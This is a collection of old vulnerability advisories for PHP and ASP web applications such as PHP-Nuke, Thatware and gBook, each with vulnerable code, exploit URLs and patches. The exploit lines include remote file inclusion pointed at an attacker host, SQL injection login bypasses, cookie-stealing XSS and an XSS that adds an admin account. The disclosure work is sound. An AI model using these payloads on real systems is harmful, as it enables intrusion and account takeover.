Informations : °° Website : http://nxwcms.sourceforge.net/ Version : 2002 PreRelease 1 Problem : Include file PHP Code/Location : °°° nx/common/cds/menu.inc.php : --- [...] require_once $c_path.common/lib/launch.inc.php; [...] --- nx/common/dbo/datasets.php : --- ? require_once $c_path.common/dbo/saveset.php; require_once $c_path.common/dbo/recordset.php; require_once $c_path.common/dbo/deleteset.php; require_once $c_path.common/dbo/updateset.php; require_once $c_path.common/dbo/insertset.php; [...] --- nx/common/lib/mass_opeations.inc.php : --- ? require_once $c_path.common/lib/launch.inc.php; require_once $c_path.common/cds/menu.inc.php; [...] --- etc... Exploits : °° http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/ with : http://[attacker]/common/lib/launch.inc.php http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/ with : http://[attacker]/common/dbo/saveset.php http://[attacker]/common/dbo/recordset.php http://[attacker]/common/dbo/deleteset.php http://[attacker]/common/dbo/updateset.php http://[attacker]/common/dbo/insertset.php etc... Solution : °° Add this line in bugged files : - if (!file_exists($c_path.index.php)){ die(Path not found.); } - A patch can be found on http://www.phpsecure.org . More details : °° In French : http://www.frog-man.org/tutos/NX.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNX.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
PEEL (PHP)
Informations : °° Version : 1.0b Website : http://www.mapetite-entreprise.com Problem : Include file PHP Code/Location : °°° modeles/haut.php : --- ? $langfile = $dirroot./lang/.$SESSION[lang]./lang.php; require ($langfile); ? [...] --- Exploit : ° http://[target]/modeles/haut.php?dirroot=http://[attacker]SESSION=. with : http://[attacker]/lang/lang.php Patch : °°° In modeles/haut.php replace the lines : --- ? $langfile = $dirroot./lang/.$SESSION[lang]./lang.php; require ($langfile); ? --- by : --- ? $langfile = $dirroot./lang/.$SESSION[lang]./lang.php; if (file_exists($langfile)){ require ($langfile); } ? --- A patch can be found on http://www.phpsecure.org More details : °° In French : http://www.frog-man.org/tutos/PEEL.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPEEL.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
SPGpartenaires (PHP)
Informations : °° Version : ? - 3.0.1 Website : http://www.scripts-php-gratuits.com Problem : SQL Injection - Access to member's accounts PHP Code/Location : °°° modif/ident.php : -- [...] $sql=SELECT nomsite FROM SPGPartenaires WHERE id='.$id.' AND motdepasse='.$pass.'; $re=@mysql_db_query($db_name,$sql,$connect); $result=@mysql_fetch_array($re); if(empty($result[0])) { header(location: index.php?msg=Identification+incorrecte+!); } else { setcookie(SPGP,$id.||.$pass,time()+84600,); header(location: index2.php); } [...] -- modif/delete.php, modif/index2.php, modif/modif.php, modif/modif_suite.php : -- ? if(!isset($SPGP)) { header(location: index.php?msg=Veuillez+vous+identifier+!); } else { $inf=explode(||,$SPGP); [...] $sql=SELECT id FROM SPGPartenaires WHERE id='.$inf[0].' AND motdepasse='.$inf[1].'; $re=@mysql_db_query($db_name,$sql,$connect); $result=@mysql_fetch_array($re); if(empty($result[0])) { header(location: index.php?msg=Veuillez+vous+identifier+!); } [...] -- Exploits : °° http://[target]/modif/ident.php?id=[MEMBERID]pass='%20OR%20''=' or QUERY : ?SPGP=[ID]%7C%7C'%20OR%20''=' with : - modif/delete.php - modif/index2.php - modif/modif.php - modif/modif_suite.php Patch : °°° In modif/ident.php replace the line : $sql=SELECT nomsite FROM SPGPartenaires WHERE id='.$id.' AND motdepasse='.$pass.'; by : --- $sql=SELECT nomsite FROM SPGPartenaires WHERE id='.addslashes($id).' AND motdepasse='.addslashes($pass).'; --- And in the other files replace the line : --- $sql=SELECT id FROM SPGPartenaires WHERE id='.$inf[0].' AND motdepasse='.$inf[1].'; --- by : --- $sql=SELECT id FROM SPGPartenaires WHERE id='.addslashes($inf[0]).' AND motdepasse='.addslashes($inf[1]).'; --- A patch can be found on http://www.phpsecure.org. More details : °° In French : http://www.frog-man.org/tutos/SPGpartenaires.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSPGpartenaires.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
WAnewsletter (PHP)
Informations : °° Website : http://www.phpcodeur.net Versions : 2.0beta - 2.1.0 Problem : Include file PHP Code/Location : °°° newsletter.php 2.1beta - 2.1.0 : if( !empty($HTTP_POST_VARS['action']) ) { $action = $HTTP_POST_VARS['action']; } else if( !empty($HTTP_GET_VARS['action']) ) { $action = $HTTP_GET_VARS['action']; } else { $action = ''; } if( $action != '' || defined('IN_WA_FORM') ) { $login = false; include_once($waroot . 'start.php'); } [...] sql/db_type.php 2.0.2 - 2.1.0 : switch($dbtype) { case 'mysql': include_once($waroot . 'sql/mysql/mysql.inc.php'); break; case 'mssql': include_once($waroot . 'sql/mssql/mssql.inc.php'); break; default: echo 'bLe type de base de données n\'est pas défini !/b'; exit; break; } [...] etc... Exploits : °° http://[target]/newsletter.php?action=1waroot=http://[attacker]/ http://[target]/sql/db_type.php?waroot=http://[attacker]/ Patch : °°° A patch can be found on http://www.phpsecure.org . More details : °° In French : http://www.frog-man.org/tutos/WAnewsletter.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWAnewsletter.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
PHP-Nuke 6.0 : Path Disclosure Cross Site Scripting
Informations : °° Product : PHP-Nuke Version : 6.0 Website : http://www.phpnuke.org Problems : - Path Disclosure - XSS Developpement : °°° The majority of the PHPNuke's files are includes in modules.php or index.php. To prevent the direct access, PHPNuke made two kinds of safety. The first one (e.g. in modules/Downloads/index.php) is : --- if (!eregi(modules.php, $PHP_SELF)) { die (You can't access this file directly...); } --- The second one (e.g. footer.php ) : if (eregi(footer.php,$PHP_SELF)) { Header(Location: index.php); die(); } Some files haven't these safety measures but they have security holes. Exploits : °° Path Disclosure : http://[target]/modules/Downloads/voteinclude.php http://[target]/modules/Your_Account/navbar.php http://[target]/modules/Forums/attachment.php http://[target]/modules/Forums/auth.php http://[target]/modules/News/comments.php http://[target]/modules/Private_Messages/functions.php http://[target]/modules/Private_Messages/index.php http://[target]/modules/Private_Messages/read.php http://[target]/modules/Private_Messages/reply.php http://[target]/modules/Web_Links/voteinclude.php http://[target]/modules/WebMail/contactbook.php?user=1 Path Disclosure Cross Site Scripting : - http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT] or http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT] or http://[target]/modules/Forums/bb_smilies.php?site_font=}--/style[SCRIPT] or http://[target]/modules/Forums/bb_smilies.php?bgcolor1=;[SCRIPT] or with : $sitename $table_width $color1 $forumver - /modules/Forums/bbcode_ref.php with : $name $Default_Theme $site_font $sitename $bgcolor2 $textcolor1 $bgcolor1 $forumver - /modules/Forums/editpost.php, /modules/Forums/newtopic.php, /modules/Forums/reply.php, /modules/Forums/topicadmin.php, /modules/Forums/viewforum.php with : $name - /modules/Forums/searchbb.php with : $name $bgcolor3 $bgcolor1 Patch : °°° A patch can be found on http://www.phpsecure.org . More details : °° In French : http://www.frog-man.org/tutos/PHPNuke6.0.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHPNuke6.0.txtlangpair=fr%7Cenhl=enie=ASCIIoe=ASCII frog-m@n _ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
Security Patchs for PHP Products
PHPSecure made some patchs for security holes in PHP products. Here is the list : - ALP - Banner Ad 2.0 : http://www.phpsecure.org/index.php?id=1zone=pDl More details : http://online.securityfocus.com/search?category=22query=ALP - Tight Auction 3.0 : http://www.phpsecure.org/index.php?id=6zone=pDl More details : http://online.securityfocus.com/search?category=22query=TightAuction - PY-Membres 3.1 : http://www.phpsecure.org/index.php?id=9zone=pDl More details : http://online.securityfocus.com/search?category=22query=PY-Membres - dobermann FORUM 0.5 : http://www.phpsecure.org/index.php?id=8zone=pDl More details : http://online.securityfocus.com/search?category=22query=dobermann FORUM - phpnewsDev 1 : http://www.phpsecure.org/index.php?id=10zone=pDl More details : http://online.securityfocus.com/search?category=22query=phpnewsDev - KillerProtection 1 : http://www.phpsecure.org/index.php?id=11zone=pDl More details : http://online.securityfocus.com/search?category=22query=KillerProtection - phpSecurePages 0.27b : http://www.phpsecure.org/index.php?id=12zone=pDl More details : http://online.securityfocus.com/search?category=22query=phpSecurePages - Avotravis 2.1 : http://www.phpsecure.org/index.php?id=13zone=pDl More details : http://online.securityfocus.com/search?category=22query=Avotravis - PunxNews 2.1 : http://www.phpsecure.org/index.php?id=14zone=pDl More details : http://online.securityfocus.com/search?category=22query=PunxNews - phpforge 2.3 : http://www.phpsecure.org/index.php?id=15zone=pDl More details : http://online.securityfocus.com/search?category=22query=phpforge - phpforge 3b2 : http://www.phpsecure.org/index.php?id=60zone=pDl More details : http://online.securityfocus.com/search?category=22query=phpforge - Inertianews 0.02 beta : http://www.phpsecure.org/index.php?id=17zone=pDl More details : http://online.securityfocus.com/search?category=22query=Inertianews - MySimpleNews 1 : http://www.phpsecure.org/index.php?id=16zone=pDl More details : http://online.securityfocus.com/search?category=22query=MySimpleNews - Pollen 1.4.1 : http://www.phpsecure.org/index.php?id=18zone=pDl More details : http://online.securityfocus.com/search?category=22query=Pollen - Pphlogger (Power Phlogger) 2.0.9 : http://www.phpsecure.org/index.php?id=7zone=pDl More details : http://online.securityfocus.com/search?category=22query=Pphlogger (Power Phlogger) - News Evolution 1.0 : http://www.phpsecure.org/index.php?id=21zone=pDl More details : http://online.securityfocus.com/search?category=22query=News Evolution - News Evolution 2.0 : http://www.phpsecure.org/index.php?id=22zone=pDl More details : http://online.securityfocus.com/search?category=22query=News Evolution - LokwaBB 1.2.2 : http://www.phpsecure.org/index.php?id=23zone=pDl More details : http://online.securityfocus.com/search?category=22query=LokwaBB - Rose 4.52 : http://www.phpsecure.org/index.php?id=24zone=pDl More details : http://online.securityfocus.com/search?category=22query=Rose - WebChat for XOOPS RC3 1-5 : http://www.phpsecure.org/index.php?id=25zone=pDl More details : http://online.securityfocus.com/search?category=22query=WebChat for XOOPS RC3 - EasyNews 4.2 , 4.3 : http://www.phpsecure.org/index.php?id=26zone=pDl More details : http://online.securityfocus.com/search?category=22query=EasyNews - Mon Album 0.6.2d : http://www.phpsecure.org/index.php?id=27zone=pDl More details : http://online.securityfocus.com/search?category=22query=Mon Album - XOOPS RC3 : http://www.phpsecure.org/index.php?id=61zone=pDl More details : http://online.securityfocus.com/search?category=22query=XOOPS - Photo Db 1.4 : http://www.phpsecure.org/index.php?id=28zone=pDl More details : http://online.securityfocus.com/search?category=22query=Photo Db - PHP Image View 1.0 : http://www.phpsecure.org/index.php?id=29zone=pDl More details : http://online.securityfocus.com/search?category=22query=PHP Image View - mcPass 1 : http://www.phpsecure.org/index.php?id=30zone=pDl More details : http://online.securityfocus.com/search?category=22query=mcPass - Pseudo-Frame 1.0 : http://www.phpsecure.org/index.php?id=31zone=pDl More details : http://online.securityfocus.com/search?category=22query=Pseudo-Frame - SimpleBBS 1.0.3 : http://www.phpsecure.org/index.php?id=32zone=pDl More details : http://online.securityfocus.com/search?category=22query=SimpleBBS - SimpleBBS 1.0.6 : http://www.phpsecure.org/index.php?id=33zone=pDl More details : http://online.securityfocus.com/search?category=22query=SimpleBBS - WSC (Web Server Creator) - Web Portal 0.1 : http://www.phpsecure.org/index.php?id=34zone=pDl More details : http://online.securityfocus.com/search?category=22query=WSC (Web Server Creator) - Web Portal - Immobilier 1 : http://www.phpsecure.org/index.php?id=35zone=pDl More details : http://online.securityfocus.com/search?category=22query=Immobilier - FreeNews 2.1 : http://www.phpsecure.org/index.php?id=20zone=pDl More details :
MyPHPLinks (PHP) : SQL Injection
Informations : °° Website : http://www.myphpsoft.net Version : ? - 2.1.9, 2.2.0CVS Problem : SQL Injection - Admin access PHP Code/Location : °°° admin/auth/checksession.php --- [...] if($idsession!=''){ $dbs = new data(0,$MyPHPLinksHote, $MyPHPLinksBase, $MyPHPLinksUser, $MyPHPLinksPass); if(!$dbs-connect()) die($dbs-error); if(!$dbs-query(select count(*) as nb from .$MyPHPLinksTBAuth. where session='.$idsession.' and timesession now())) die($dbs-error); while($dbs-nextrecord()){ $loginauth = $dbs-valeur(nb); } if ($loginauth==0){ header(Location:$MyPHPLinksAuthPErrDef);exit; }else{ if(!$dbs-query(UPDATE .$MyPHPLinksTBAuth. set timesession=now()+.$MyPHPLinksTLSession. where session='.$idsession.')) die($dbs-error); } }else{ header(Location:$MyPHPLinksAuthPErrDef);exit; } ? --- Exploit : ° http://[target]/admin/index.php?idsession='%20OR%20''=' Patch : °°° A patch can be downloaded on http://www.phpsecure.org/index.php?zone=pPatchAsAlpha=m . More details : °° In French : http://www.frog-man.org/tutos/MyPhpLinks.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyPhpLinks.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
Re: XSS and Path Disclosure in UPB
Anything about UPB was already wrote (1.1 1.0beta) : http://www.frogsecure.com/tutos/UPB.txt From: euronymous [EMAIL PROTECTED] Reply-To: [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: XSS and Path Disclosure in UPB Date: Sat, 7 Dec 2002 20:08:34 +0300 (MSK) =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: XSS and Path Disclosure in UPB product: Ultimate PHP Board (UPB) final beta 1.0 vendor: http://www.webrc.ca/php/upb.php risk: middle date: 12/7/2k2 discovered by: euronymous /F0KP /HACKRU Team advisory url: http://f0kp.iplus.ru/bz/009.txt =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= description --- 1) when calling add.php, which comming with upb, it output some error message, that contain foloving information: Warning: Failed opening 'textdb_v2.inc.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/samcom/public_html/public/messageboard2/add.php on line 5 attempting to edit record... Fatal error: Call to undefined function: format_field() in /home/samcom/public_html/public/messageboard2/add.php on line 11 as you can see, script output contain full physical path of the board. 2). but if user has deleted this file (add.php) u can to view the full path in this way: == http://hostname.com/phorum/viewtopic.php?id=some_shitt_id=2 == cos the `id' parameter doesnt check if input data has entered correctly, then it output folloving error message: ===--=== snip = Warning: Unable to access ./data_dir/some_shit.dat in /home/samcom/public_html/public/messageboard2/textdb.inc.php on line 240 .. Warning: Supplied argument is not a valid File-Handle resource in /home/samcom/public_html/public/messageboard2/textdb.inc.php on line 241 .. === snip == where `data_dir' is the name of directory, where stored important files, eg users.dat with users passwords (md5). in default name of this directory is `db'. if user doesnt make this dir secure, then you can to get the users passwds with reading file users.dat (default name.. but it is an old stuff) and cracking the .md5 hashes. 3) cos the above, file viewtopic.php doesnt check at all, the you can insert some html in scripts output: http://hostname.com/phorum/viewtopic.php?id= %3Cscript%3Ealert(document.cookie)%3C%2Fscript%3Et_id=2 [it must be in a single string] not URL-encoded string working fine also. ps. all of this issues applied to previus versions upb. shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all russian security guyz!! and kate for she is kewl girl )) fuck_off: slavomira and other dirty ppl in *.kz im not a lame, not yet a hacker _ MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
Thatware (PHP)
Informations : °° Versions : ? - 0.3 - 0.5.3 Website : http://www.thatware.org Problems : - Include file - SQL Injection PHP Code/Location : °°° artlist.php (v0.5.2, 0.5.3) : - include $root_path.'thatfile.php'; - config.php (v? - 0.3 - 0.5.3) : - include $root_path.db_settings.php; - thatfile.php (v? - 0.3 - 0.5.2) : if (!IsSet($thatfile)) { include($root_path.config.php); if (!IsSet($translation_set)) { include $root_path.messages.$language.php; } #Translation module, even for english needed! auth.inc.php (v? - 0.3 - 0.5.0) : $admintest = 0; $mod_ok = 0; $moderator = 0; if(isset($user)) { if (!$thatfile) include(thatfile.php); $admin = base64_decode($user); $admin = explode(:, $admin); if (empty($admin[0]) || empty($admin[2])) exit; $aid = $admin[1]; dbconnect(); $result=mysql_query(select rights from users where uid='$admin[0]' and pass='$admin[2]'); if(!$result) { echo Oh oh... select from database failed for admin check; exit; } else { list($auth_rights)=mysql_fetch_row($result); $auth_rights=explode(,,$auth_rights); if (!empty($auth_rights)) { $admintest=1; if (inarray($auth_rights, 4)||inarray($auth_rights, 1)) { $moderator=1; $mod_ok=1; } } } } Exploits : °° v0.5.2, 0.5.3 : http://[target]/artlist.php?root_path=http://[attacker]/ with http://[attacker]/thatfile.php v? - 0.3 - 0.5.3 : http://[target]/config.php?root_path=http://[attacker]/ with http://[attacker]/db_settings.php v? - 0.3 - 0.5.2 : http://[target]/thatfile.php?root_path=http://[attacker]/language=1 with http://[attacker]/config.php and http://[attacker]/messages.1.php v? - 0.3 - 0.5.0 : http://[target]/[NeedToBeAuth].php?user=JyBPUiAnJz0nOjE6JyBPUiAnJz0n ( base64_decode(JyBPUiAnJz0nOjE6JyBPUiAnJz0n) == ' OR ''=':1:' OR ''=') Patchs : 0.5.3: http://www.phpsecure.org/patch/dl.php?id=47 0.5.2: http://www.phpsecure.org/patch/dl.php?id=51 0.5.0: http://www.phpsecure.org/patch/dl.php?id=50 0.4.5: http://www.phpsecure.org/patch/dl.php?id=52 0.4.4: http://www.phpsecure.org/patch/dl.php?id=49 0.4.3: http://www.phpsecure.org/patch/dl.php?id=48 0.4.2: http://www.phpsecure.org/patch/dl.php?id=53 0.4.1: http://www.phpsecure.org/patch/dl.php?id=54 0.4: http://www.phpsecure.org/patch/dl.php?id=55 0.3: http://www.phpsecure.org/patch/dl.php?id=56 More details : °° In French : http://www.frog-man.org/tutos/Thatware.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FThatware.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
FreeNews News Evolution (PHP)
Informations : °° Problem : Include files a) --- Product : Freenews Version : 2.1 Website : http://www.prologin.fr -- b) --- Product : News Evolution Versions : 1.0, 2.0 Website : http://www.phpevolution.net -- PHP Code/Location : °°° a) freenews 2.1 aff_news.php : - include ($chemin/config.php); include ($chemin/options.inc.php); include ($chemin/freenews_functions.inc.php); - ... b) News Evolution 1.0 aff_news.php : - include ($chemin/config.php); include ($chemin/functions.inc.php); include ($chemin/options.inc.php); - moteur/moteur.php : -- include ($chemin/moteur/moteur_form.php); include ($chemin/moteur/moteur_tab_results.php); -- export_news.php : --- include ($chemin/config.php); include ($chemin/functions.inc.php); include ($chemin/options.inc.php); include($chemin/exporthtm.inc.php); --- ... c) News Evolution 2.0 backend.php : - include_once($neurl/admin/modules/rss/easyRSS.inc.php); - screen.php : - include_once($neurl/admin/cfg/configsql.inc.php); include_once($neurl/admin/cfg/configscreen.inc.php); include_once($neurl/admin/cfg/configsite.inc.php); include_once($neurl/admin/cfg/configtache.inc.php); include_once($neurl/admin/$sitelang); include_once($neurl/admin/fonctions/fctscr.php); include_once($neurl/admin/fonctions/fctadmin.php); include_once($neurl/admin/fonctions/fctform.php); include_once($neurl/admin/modules/cache.php); - admin/modules/comment.php : - @include_once($neurl/admin/cfg/configscreen.inc.php); @include_once($neurl/admin/cfg/configsite.inc.php); @include_once($neurl/admin/$sitelang); - ... Exploits : °° a) freenews 2.1 http://[target]/aff_news.php?chemin=http://[attacker] with http://[attacker]/config.php http://[attacker]/options.inc.php http://[attacker]/freenews_functions.inc.php ... b) News Evolution 1.0 http://[target]/aff_news.php?chemin=http://[attacker]/ with http://[attacker]/config.php http://[attacker]/functions.inc.php http://[attacker]/options.inc.php ... c) News Evolution 2.0 http://[target]/screen.php?neurl=http://[attacker] with : http://[attacker]/admin/cfg/configsql.inc.php http://[attacker]/admin/cfg/configscreen.inc.php http://[attacker]/admin/cfg/configsite.inc.php http://[attacker]/admin/cfg/configtache.inc.php http://[attacker]/admin/fonctions/fctscr.php http://[attacker]/admin/fonctions/fctadmin.php http://[attacker]/admin/fonctions/fctform.php http://[attacker]/admin/modules/cache.php ... Patch : °°° http://www.phpsecure.org More details : °° In French : http://www.frog-man.org/tutos/NEfree.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNEfree.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
Immobilier 1 (PHP)
Informations : °° Version, Website : ? Problems : - phpinfo() - SQL Injection PHP Code/Location : °°° agentadmin.php : -- [...] } elseif ($agentname != OR $current_user != ) { $sql = SELECT id FROM agents WHERE agent='$agentname' and agentpass='$agentpassword'; $result = mysql_query($sql) or die(Couldn't execute query.); $num = mysql_numrows($result); if ($num == 1) { session_register(agentname); session_register(agentpassword); [...] session_register(current_user); session_register(agent); [...] -- admin/phpinfo.php : --- ? phpinfo(); ? --- Exploits : °° http://[target]/agentadmin.php?agentname='%20OR%20''='agentpassword='%20OR%20''=' or http://[target]/agentadmin.php?agentname=[USERNAME]agentpasword='%20OR%20''=' http://[target]/admin/phpinfo.php Solutions : °°° - Delete /admin/phpinfo.php - Put this lines : -- $agentname=addslashes($agentname); $currentuser=addslashes($currentuser); $agentpassword=addslashes($agentpassword); -- into common.php. A patch can be found on http://www.phpsecure.org. More details : °° In french : http://www.frog-man.org/tutos/Immoblier.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FImmoblier.txtlangpair=fr%7Cenhl=frie=ASCIIoe=ASCII frog-m@n _ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
Web Server Creator - Web Portal 0.1 (PHP)
Informations : °° Website : http://webcreator.com02.com Tested version : 0.1 Problem : Include file PHP Code/Location : °°° news/include/customize.php : -- ? $langfile = $l; include $l; ? -- index.php : --- [...] if (!$pg) { $pg = acceuil; } [...] require ($pg.php); ? [...] --- Exploits : °° http://[target]/news/include/customize.php?l=http://[attacker]/file.txt with http://[attacker]/file.txt and http://[target]/index.php?pg=http://[attacker]/badfile with http://[attacker]/badfile.php Solution : °° - Delete bugged lines in news/include/customize.php - In index.php replce this line : require ($pg.php); by : --- if (file_exists($pg..php)){ require ($pg.php); } --- A patch can be found on http://www.phpsecure.org. More details : °° In french : http://www.frog-man.org/tutos/WSC-WebPortal.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWSC-WebPortal.txtlangpair=fr%7Cenhl=frie=ASCIIoe=ASCII frog-m@n _ MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
dobermann FORUM (php)
Informations : °° Product : dobermann FORUM version : 0.5 website : http://www.le-dobermann.com Problem : Include file PHP Code/location : °°° entete.php enteteacceuil.php topic/entete.php : -- ?php include $subpath.banniere.php; ? -- index.php newtopic.php : require config.php; include(entete.php); Exploits : °° http://[target]/entete.php?subpath=http://[attacker]/ http://[target]/enteteacceuil.php?subpath=http://[attacker]/ http://[target]/topic/entete.php?subpath=http://[attacker]/ http://[target]/index.php?subpath=http://[attacker]/ http://[target]/newtopic.php?subpath=http://[attacker]/ with http://[attacker]/banniere.php Patch : °°° In files : -- entete.php enteteacceuil.php topic/entete.php -- replace the line : -- ?php include $subpath.banniere.php; ? -- by : -- ?php $banfile=$subpath.banniere.php; if (file_exists($banfile)){ include $banfile; } ? -- More details in french : http://www.frog-man.org/tutos/dobermannFORUM.txt translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FdobermannFORUM.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-mn _ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
gBook
Informations : °° Language : PHP Tested version : 1.4 Problem : Admin access PHP Code : °° /gb/index.php : -- ?php include(config.inc.php); if($action == login) { if($user == $loginu $pw == $loginpw) { setcookie(login, true, time()+3600); header(location: index.php); } else { setcookie(login, false, -3600); header(location: index.php?fehler=login); } } ? [...] ?php if($login == true) { [ADMIN CODE] [...] -- Exploit : ° http://[Target]/gb/index.php?login=true Patch : °°° Using of .htaccess. More details in french : http://www.frog-man.org/tutos/gBook.txt Translated by google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FgBook.txtlangpair=fr%7Cenhl=frie=ASCIIoe=ASCII frog-mn _ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
phpnewsDev
Informations : °° Language : PHP Tested version : 1 Problem : bad use of include() PHP Code : °° ---Include/variables.php3--- ? $Mac=localhost; $Uti=root; $Mot=; $Bd=phpnews; $AnneeDeDemarrage=2000; $MoisDeDemarrage=8; $NbNouvelles=5; require($Include/french.inc); ? --- and Include/lib.inc.php3 : include($Include/config.inc.php3); Exploits : °° http://[target]/variables.php3?Include=http://[attacker] with in the file http://[attacker]/french.inc : ? print(centeruMySQL Infos/u/center\n\nServeur: $Mac \nLogin: $Uti \nPass: $Mot \nDB Name: $Bd); ? and http://[target]/Include/lib.inc.php3?http://[attacker] with in a bad php code in the file : http://[attacker]/config.inc.php3 Patch : °°° Add to the beginning of : -- Include/lib.inc.php3 Include/variables.php3 -- the line : $Include=Include; More details in french : http://www.frog-man.org/tutos/phpnewsDev.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpnewsDev.txtlangpair=fr%7Cenhl=frie=ASCIIoe=ASCII frog-mn _ MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
SSGbook (ASP)
Informations : °° Product : SSGbook Langage : ASP Tested version : 1 Website : http://www.script-shed.com Problem : Cross Site Scripting PHP Code / location : ° - config.asp -- fString = doCode(fString, [img],[/img],img src=, border=0) fString = doCode(fString, [image],[/image],img src=, border=0) fString = doCode(fString, [img=right],[/img=right],img align=right src=, id=right border=0) fString = doCode(fString, [image=right],[/image=right],img align=right src=, id=right border=0) fString = doCode(fString, [img=left],[/img=left],img align=left src=, id=left border=0) fString = doCode(fString, [image=left],[/image=left],img align=left src=, id=left border=0) - config.asp -- Exploit : ° [image]javascript:{SCRIPT}[/image] [img=right]javascript:{SCRIPT}[/img=right] [image=right]javascript:{SCRIPT}[/image=right] [img=left]javascript:{SCRIPT}[/img=left] [image=left]javascript:{SCRIPT}[/image=left] [img]javascript:{SCRIPT}[/img] e.g. : [image]javascript:document.location=ss_admin.asp?Mode=UpdateActon=AccessUserName=PomPassword=turlututu;[/image] Add an admin if an admin read it. Login : Pom, Password : turlututu Patch : °°° In config.asp : Add this line : strOutput = Replace(strOutput, chr(34), quot;) after -- strOutput = Replace(strOutput, , lt;) strOutput = Replace(strOutput, , gt;) -- And replace this lines : fString = doCode(fString, [img],[/img],img src=, border=0) fString = doCode(fString, [image],[/image],img src=, border=0) fString = doCode(fString, [img=right],[/img=right],img align=right src=, id=right border=0) fString = doCode(fString, [image=right],[/image=right],img align=right src=, id=right border=0) fString = doCode(fString, [img=left],[/img=left],img align=left src=, id=left border=0) fString = doCode(fString, [image=left],[/image=left],img align=left src=, id=left border=0) by : fString = doCode(fString, [img]http://,[/img],;img src=http://,; border=0) fString = doCode(fString, [image]http://,[/image],;img src=http://,; border=0) fString = doCode(fString, [img=right]http://,[/img=right],;img align=right src=http://,; id=right border=0) fString = doCode(fString, [image=right]http://,[/image=right],;img align=right src=http://,; id=right border=0) fString = doCode(fString, [img=left]http://,[/img=left],;img align=left src=http://,; id=left border=0) fString = doCode(fString, [image=left]http://,[/image=left],;img align=left src=http://,; id=left border=0) More details in french : http://www.frog-man.org/tutos/SSGbook.txt translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSSGbook.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ Discutez en ligne avec vos amis ! http://messenger.msn.fr
phpSecurePages Killer Protection ( PHP )
1) Informations : °° Product : phpSecurePages Tested version : 0.27b Website : http://www.phpsecurepages.f2s.com Problem : include file PHP Code : °° -- checklogin.php - if (!$login) { // no login available include($cfgProgDir . interface.php); exit; } if (!$password) { // no password available $message = $strNoPassword; include($cfgProgDir . interface.php); exit; } -- checklogin.php -- Exploit : ° http://[target]/checklogin.php?cfgProgDir=http://[attacker]/ or http://[target]/checklogin.php?cfgProgDir=http://[attacker]/login=1 with http://[attacker]/interface.php . Patch : °°° Add this : $cfgProgDir = './'; at the begin of checklogin.php . More details in french : http://www.frog-man.org/tutos/phpSecurePages.txt translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpSecurePages.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools 2) Informations : °° Product : Killer Protection Tested version : 1 Website : http://php3scripts.cjb.net Problem : Informations disclosure Exploit 